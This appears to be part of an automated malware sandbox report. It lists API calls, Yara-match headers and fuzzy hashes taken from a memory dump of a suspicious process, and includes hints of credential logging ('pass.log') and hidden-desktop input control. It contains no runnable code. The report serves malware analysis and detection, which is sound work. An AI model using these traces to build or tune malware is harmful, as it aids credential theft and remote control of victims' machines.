                                                                                                                                                                                                            • API ID: Heaprecv$FreeProcesssend
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2415998009-0
                                                                                                                                                                                                            • Opcode ID: 3c92673bbe73a2d05446bf10ff2549189418f6af7adc549a1818d7649238bea3
                                                                                                                                                                                                            • Instruction ID: f49c5bf07bcd40688b868be392a90940f3f64bea19a12c2ba134ed7f93b76c8c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c92673bbe73a2d05446bf10ff2549189418f6af7adc549a1818d7649238bea3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE01B1B26402047BE7209B689C45FAB7B6CEB49740F144099BB04EB181D6B4A9418BB4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000), ref: 02BBD242
                                                                                                                                                                                                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02BBD259
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BBD26F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BBD280
                                                                                                                                                                                                            • ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 02BBD297
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1270303404-0
                                                                                                                                                                                                            • Opcode ID: 19af8b8f19db094c32ef9398aeeb80a29694cfdbef6d33dabd457ec4cba11017
                                                                                                                                                                                                            • Instruction ID: 6cabf42b3b44b32cbc06daf427477132f02397d9518f7fca14231668187d59b7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19af8b8f19db094c32ef9398aeeb80a29694cfdbef6d33dabd457ec4cba11017
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A016935E81218BBE7209B94DD09FEE7B6CEF05B41F804684FB41A60C0D7F49A948BA5
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,00000000,02BCA693,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6BC
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6C6
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6CD
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCA6DE
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA72A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocMutexObjectProcessReleaseSingleWaitmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 819421891-0
                                                                                                                                                                                                            • Opcode ID: 3dcc49bd551b73925b072a380c2ca030c6ae72b49b452c10176c2f4d21dc3593
                                                                                                                                                                                                            • Instruction ID: df5e53a0fd42dce05a60125e0e2af11677a6404c3d8665ac72eac5495bc23f72
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3dcc49bd551b73925b072a380c2ca030c6ae72b49b452c10176c2f4d21dc3593
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D0105B5A41B11AFC3A4CF28E494A06FBF4FF48740B108A19EA9A97B90C730B550CF94
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?,?,00000000,76F93080,?,02BB922C,?,00000006,00000000), ref: 02BBE38C
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02BBE3A3
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02BBE3A6
                                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000006,?,02BB922C), ref: 02BBE3BD
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000003), ref: 02BBE3C2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$DesktopMessageSendThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3855296974-0
                                                                                                                                                                                                            • Opcode ID: b04097a1a038360c9dc744a78c600bb046bd224bb95f00455d0ec92d2f9809f8
                                                                                                                                                                                                            • Instruction ID: 8250f286c82e90cc20d4e9cfc4a2dc18a300c2992411abdc38f77cd635c348dd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b04097a1a038360c9dc744a78c600bb046bd224bb95f00455d0ec92d2f9809f8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0F01276A412187BD7319B69EC88EAFB79CDB887A0F418515FE0197390D6B0ED108BB0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBD2BC
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BBD2C4
                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02BBD2D0
                                                                                                                                                                                                            • SendMessageA.USER32(?,0000000D,?,?), ref: 02BBD2E1
                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02BBD2ED
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2643679612-0
                                                                                                                                                                                                            • Opcode ID: 70b10d44adb67a164d65d49c246a28f6a88d13d77aba1ca7bcb1a01127ad0fa0
                                                                                                                                                                                                            • Instruction ID: 5e1d1d8c046da1a91c7ec4d4bbd33a2ea14526ae2135bacf49eaa46c61bc5c9d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70b10d44adb67a164d65d49c246a28f6a88d13d77aba1ca7bcb1a01127ad0fa0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66F037726412047FE3205B65EC8DFABBF6CEB497A1F544415FB05D7241C57198108770
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBE34A
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BBE352
                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,02BB9F24,?,?,?,?,02BB9400,?,?), ref: 02BBE364
                                                                                                                                                                                                            • GetFocus.USER32 ref: 02BBE366
                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,02BB9F24,?,?,?,?,02BB9400,?,?), ref: 02BBE373
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Thread$AttachInput$CurrentFocusProcessWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 968181190-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,02BC8E9D,?,?,?,?,?,?), ref: 02BB7987
                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02BB7992
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BB799A
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02BB79A5
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02BB79AC
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$AdminCreateDirectoryFolderMakePathSystemUser
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1233776721-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C058), ref: 02BCB137
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02BCB175
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 02BCB1B9
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FilePath$AttributesBackslashExists
                                                                                                                                                                                                            • String ID: pass.log
                                                                                                                                                                                                            • API String ID: 2713433229-3890513154
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • HttpAddRequestHeadersW.WININET(?,?,?,A0000000), ref: 02BC0F0D
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 02BC0F20
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeadersHttpRequest
                                                                                                                                                                                                            • String ID: ($Accept-Encoding:
                                                                                                                                                                                                            • API String ID: 1754618566-3981465706
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • free.MSVCRT(?,76E67310,00000000,02BDA320), ref: 02BE41EB
                                                                                                                                                                                                            • free.MSVCRT(?,76E67310,00000000,02BDA320), ref: 02BE41FD
                                                                                                                                                                                                            • free.MSVCRT(?,76E67310,00000000,02BDA320), ref: 02BE420F
                                                                                                                                                                                                            • free.MSVCRT(?,76E67310,00000000,02BDA320), ref: 02BE4221
                                                                                                                                                                                                            • free.MSVCRT(?,76E67310,00000000,02BDA320), ref: 02BE422B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BE13F9
                                                                                                                                                                                                            • realloc.MSVCRT ref: 02BE1405
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BE14AC
                                                                                                                                                                                                            • realloc.MSVCRT ref: 02BE14B8
                                                                                                                                                                                                              • Part of subcall function 02BE0EA0: __WSAFDIsSet.WS2_32(?,?), ref: 02BE0F50
                                                                                                                                                                                                              • Part of subcall function 02BE0EA0: closesocket.WS2_32(?), ref: 02BE0F6D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: mallocrealloc$closesocket
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 403730927-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: fwrite$fseek
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3883414211-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC2392
                                                                                                                                                                                                            • GetParent.USER32(?), ref: 02BC239E
                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000104), ref: 02BC23B5
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02BC23D6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ParentTextWindowmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4175915554-0
                                                                                                                                                                                                            • Opcode ID: 9dcd06ed8578c6f68efa3cad6d5b0d3757119169d568e06d943efb1d31c43956
                                                                                                                                                                                                            • Instruction ID: 257395ed3f623d7a43c3eb77de86609f8cf3c78d6f45bc289a34343a1f2b1c4a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9dcd06ed8578c6f68efa3cad6d5b0d3757119169d568e06d943efb1d31c43956
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2401F573B403246BD7209A6DAC88AA7B36DEB40555F5082BAFF49E3201EA70D95487E0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000020,00000000,-00000010,?,02BB432B,?), ref: 02BB409C
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02BB432B,?), ref: 02BB40A3
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB40E2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocProcess_snprintf
                                                                                                                                                                                                            • String ID: %d.%d.%d.%d
                                                                                                                                                                                                            • API String ID: 1060465051-3491811756
                                                                                                                                                                                                            • Opcode ID: 50368f5fb50ae9186960708600e48120e7a41989c617a9434d2e79796f99eee3
                                                                                                                                                                                                            • Instruction ID: fba483f3abb853bac900456353962cc15e0d9d27534b79def3f5e5b0c31d69ee
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 50368f5fb50ae9186960708600e48120e7a41989c617a9434d2e79796f99eee3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76F081B1940710AFD3B0CF6D9804B66BBE8EF0C651B40892EF69AC7641D23491148BB0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,00000000,?,?,02BC8BDE,00000000,02BC0BE3,?,?,?,?,?,?), ref: 02BCB8A0
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCB740,00000000,00000000,00000000), ref: 02BCB8B5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,02BC0BE3,00000000,?,?,02BC8BDE,00000000), ref: 02BCB8D3
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,02BC8BDE,00000000), ref: 02BCB8E4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1825730051-0
                                                                                                                                                                                                            • Opcode ID: fd88eab2c7ba76ff40079f4aecfe7b236d5e37179b1fdb5099da81145f6cc21d
                                                                                                                                                                                                            • Instruction ID: a2c7866aae18e335454f32a516ad4e128752a8a92974cfd45b946ef873380998
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd88eab2c7ba76ff40079f4aecfe7b236d5e37179b1fdb5099da81145f6cc21d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EF05474A84304BBE7709B65EC4BF5E37ACEB05B49F600598FA05E71C0D7B4B5108B64
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: private$public
                                                                                                                                                                                                            • API String ID: 0-4176808989
                                                                                                                                                                                                            • Opcode ID: 4a4bcab08c96a9de7a17b48292f18dc2a104350d9cef34a231953395ab11e24a
                                                                                                                                                                                                            • Instruction ID: 39843ed77b78efe42e3a7413c1cb371f84b9090feec5068c6fbfc9ec0bd891b1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a4bcab08c96a9de7a17b48292f18dc2a104350d9cef34a231953395ab11e24a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7414B326042058BCF388A6C85553B67363EBC5358B7846EFD94A8BA54F7A1E545C780
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CountTick_snprintf
                                                                                                                                                                                                            • String ID: %dd %dh %dm
                                                                                                                                                                                                            • API String ID: 3495410349-3074259717
                                                                                                                                                                                                            • Opcode ID: 69643174109c5536fcbcbd6e718db5f21fcc47196105d10d64fd02d6b1914d08
                                                                                                                                                                                                            • Instruction ID: 54aa08604c8f0f16efe1d5eca1bab5010fda2194527d0da693eb84138db5a1e4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69643174109c5536fcbcbd6e718db5f21fcc47196105d10d64fd02d6b1914d08
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6F0E272B8111417A36C541E6C0AAAA598BC7C83113CCC63CFE0BCF3D8DDA49C5142D0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BDB0AE
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BDB0C3
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BDB0E9
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BDB104
                                                                                                                                                                                                              • Part of subcall function 02BDA9D0: free.MSVCRT(?,?,?,76E67310,?,02BDCEC2,?,?,?,02BDA2D8), ref: 02BDA9FF
                                                                                                                                                                                                              • Part of subcall function 02BDA9D0: free.MSVCRT(02BDCEC2,?,?,76E67310,?,02BDCEC2,?,?,?,02BDA2D8), ref: 02BDAA0F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: malloc$free
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1480856625-0
                                                                                                                                                                                                            • Opcode ID: 1ff6215390c1cc3faaad82fab9e7b65c946c87036aa253557814946080e39a38
                                                                                                                                                                                                            • Instruction ID: 5c588fcbd2237a84ed566351586b33b83c61fe3700a8216eb36cdb464ce8718b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ff6215390c1cc3faaad82fab9e7b65c946c87036aa253557814946080e39a38
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B21AFB16013059FD710CF1AD984A46FBE8FF99310F15C5AAE6498B362D7B5E910CFA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000014,00000000,?,?,?,02BBEF5B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer), ref: 02BBEB1F
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02BBEF5B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer,?), ref: 02BBEB26
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BBEB36
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BBEB41
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 471586229-0
                                                                                                                                                                                                            • Opcode ID: 7423c6a89965f8944d68b4886f373f8f7a6adb4de3f56fc3cb5ca7e7a099eb0e
                                                                                                                                                                                                            • Instruction ID: c80bd25a5b6b541bd2388f965fdf9b30b61584d8f4a9929b50189f603fa890c8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7423c6a89965f8944d68b4886f373f8f7a6adb4de3f56fc3cb5ca7e7a099eb0e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7601F2336002156BD7329A68ACC4FEBB7ECEF46760B844781FE16CB191D760E90487E0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,02BBFA2B,?,?,?), ref: 02BBF388
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02BBFA2B,?,?,?), ref: 02BBF38F
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BBF39F
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BBF3AA
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 471586229-0
                                                                                                                                                                                                            • Opcode ID: 8b181cff673113253bdef02b3a737c826583d8d3e4a7d9acebc80ae3461898fd
                                                                                                                                                                                                            • Instruction ID: 02cd2ca74084abcf3236a32b05680dda7670d2201db481e94ed3f0c922b3afa3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b181cff673113253bdef02b3a737c826583d8d3e4a7d9acebc80ae3461898fd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AF0E533A0161077D6616AA9AC44FAF776CEF867A0F414350FF04EB241CA64DC1487F4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BF4145
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BF4148
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BF4155
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BF4158
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1670920773-0
